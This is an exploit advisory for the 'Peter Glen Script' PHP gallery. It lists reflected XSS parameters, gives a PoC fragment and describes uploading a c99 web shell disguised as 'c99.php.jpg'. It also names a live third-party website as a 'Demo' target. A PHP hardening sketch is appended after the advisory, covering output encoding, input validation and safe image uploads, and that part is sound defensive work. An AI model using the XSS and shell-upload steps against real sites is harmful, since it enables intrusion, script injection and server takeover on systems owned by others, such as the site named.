 ______     __     ______
/\  == \   /\ \   /\  __ \
\ \  __<   \ \ \  \ \ \/\ \
 \ \_____\  \ \_\  \ \_____\
  \/_____/   \/_/   \/_____/

01000010 01101001 01001111

[#]----------------------------------------------------------------[#]
#
# [x] Peter Glen Script [XSS/Shell Upload]
# [x] Author: bi0
# [x] Contact: bukibv@hotmail.com
# [x] Homepage : www.ssteam.ws
# [x] Thanks: packetdeath and ssteam.ws
#
[#]-------------------------------------------------------------------------------------------[#]
#
# [x] Exploit :
#
# [XSS]
# http://localhost/gallery/delete.php?item=[XSS]
# http://localhost/gallery/edit.php?item=[XSS]
# http://localhost/gallery/index.php?next=[XSS]
# http://localhost/gallery/showitem.php?item=[XSS]
#
# [x] Poc :
#
# http://localhost/gallery/delete.php?item="/>
#
# [Shell Upload]
#
# http://localhost/gallery/gallery/submit.php
# and upload shell in jpg format ex : c99.php.jpg
#
[#]------------------------------------------------------------------------------------------[#]
#
# Demo :
#
# [+] http://siestadrumcircle.com/gallery/
#
[#]-------------------------------------------------------------------------------------------[#]
#EOF
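
A hardening sketch for the two issues listed above, added here as an example; it is not part of the original advisory or of the gallery script's code. The function names, the destination directory and the assumption that `item` and `next` are numeric ids are hypothetical.

```php
<?php
// Added example: hypothetical helpers, not code from the gallery script.

// Encode a request value before echoing it into HTML (item=, next=).
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Assumption: item/next are non-negative integer ids; anything else is rejected.
function int_param(array $query, string $name): ?int
{
    $v = filter_var($query[$name] ?? null, FILTER_VALIDATE_INT,
                    ['options' => ['min_range' => 0]]);
    return $v === false ? null : $v;
}

// Accept an upload only if its bytes are a real image. The client-supplied
// name (for example "c99.php.jpg") is never used for the stored file.
function store_image(array $file, string $destDir): string
{
    $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];

    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }

    // Detect the type from the content, not from the name or the
    // Content-Type header sent by the browser.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!is_string($mime) || !isset($allowed[$mime])
        || getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not an accepted image');
    }

    // Server-generated name with exactly one extension, chosen from the
    // detected type, so no ".php" segment can survive in the stored name.
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    if (!move_uploaded_file($file['tmp_name'], $destDir . '/' . $name)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}
```

A file can be a valid image and still carry embedded script text, so the upload directory should also be served with script execution disabled.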